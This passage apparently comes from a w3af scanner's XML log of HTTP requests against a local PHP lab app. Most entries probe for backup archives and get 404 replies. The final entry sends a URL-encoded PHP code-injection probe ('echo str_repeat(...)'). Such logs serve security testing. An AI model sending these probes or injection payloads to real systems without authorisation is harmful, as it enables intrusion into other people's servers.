code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="225">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="226">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="227">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="228">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="229">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="230">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.7z HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="231">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.cab HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="233">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="235">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="237">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.gzip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="239">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="240">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="241">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="242">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="553" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="243">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="244">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.tgz HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="245">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.rar HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="246">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="247">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/192.168.0.116.zip HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/192.168.0.116.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="248">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/echo+str_repeat%28%27rkdxj%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
